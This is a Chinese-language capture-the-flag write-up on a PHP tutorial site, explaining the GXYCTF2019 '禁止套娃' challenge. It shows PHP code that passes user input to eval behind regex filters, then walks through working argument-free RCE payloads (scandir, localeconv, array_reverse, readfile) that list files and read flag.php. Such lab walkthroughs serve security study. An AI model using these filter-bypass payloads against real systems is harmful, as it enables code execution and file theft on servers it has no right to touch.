[PHP知识库] 无参数RCE

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> 无参数RCE -> 正文阅读

[PHP知识库]无参数RCE

?[GXYCTF2019]禁止套娃

<?php
include "flag.php";//执行并包含flag.php
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){//以get方式提交exp，非空且为字符串
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

第一个

正则表达式将会过滤data://,filter://,php://,phar://等伪协议读取flag.php

php中的!号作用通俗点理解就是否定的意思比如： a==b 表示a要等于b， !a==b 表示a不等于b

pret_match()函数是正则表权达式匹配，匹配成功就返回true，匹配不成功就返回false 前面加个!那就需要这个函数返回false，也就是没有匹配上

第二个

preg_replace()函数，preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp'])，主要功能就是限制我们传输进来的必须是纯小写字母的函数，而且不能携带参数

第三个

则直白的过滤了et|na|info|dec|bin|hex|oct|pi|log

一三两个规则很好理解，关键在于第二个preg_replace()函数的具体作用，也就是无参数函数校验

什么是无参数函数RCE

当我们有eval($_GET['exp']);时，代表着拥有了一句话木马，可以getshell，但是如果有以下限制时，我们使用的参数则无法通过校验

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {    
    eval($_GET['exp']);
}

preg_replace()函数，将会执行一个正则表达式的搜索与替换，当$pattern也就是/[a-z,_]+((?R)?)/时，替换为null值，这里需要传入的参数为小写字母，且不能携带参数。只能匹配通过无参数的函数

“+”表示匹配前面的子表达式一次或多次(大于等于1次）。例如，“gy+”能匹配“gy”以及“gyy”

(?R) : 表示当前表达式(/[a-z,_]+((?R)?)/)一直递归

(?R)?表示递归整个匹配模式零次或者一次

所以preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp'])大致含义就是匹配无参数的函数，但是内部可以无限嵌套相同的模式

print_r(scandir('a()'));可以执行
print_r(scandir('a(b(c()))'));可以执行
print_r(scandir('123'));不可以执行
___________________________________________________________
所以这个正则只会匹配到
a();
a(b(c()));
带上参数比如system('ls /');是无法执行的，我们只能使用没有参数的函数来进行远程代码执行

在phpstudy的www下创建一个php文件：

<?php
print_r(scandir('.'));
?>

访问：

既然这样，利用scandir('.')即可尝试查看flag，可惜失败了

scandir() 读取当前目录下的所有文件，但是由于只能使用没有参数的函数来进行远程代码执行，那么'.'如何绕过呢？

这里引入两个函数

localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.

current()函数返回数组中的当前单元, 默认取第一个值

将第一个函数套入第二个函数，也就是current(localeconv())，这样就永远返回'.'

构造payload：

?exp=print_r(scandir(current(localeconv())));

既然查看到flag.php在倒数第二个数组内，只要解决如何查看的问题即可提交flag

array_reverse()以相反的元素顺序返回数组

next()函数将数组中内部指针向前移动一位

构造payload：

?exp=print_r(next(array_reverse(scandir(current(localeconv())))));

如何读取flag？

readfile()

highlight_file()

构造payload（都可得flag）：

?exp=print_r(readfile(next(array_reverse(scandir(current(localeconv()))))));

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));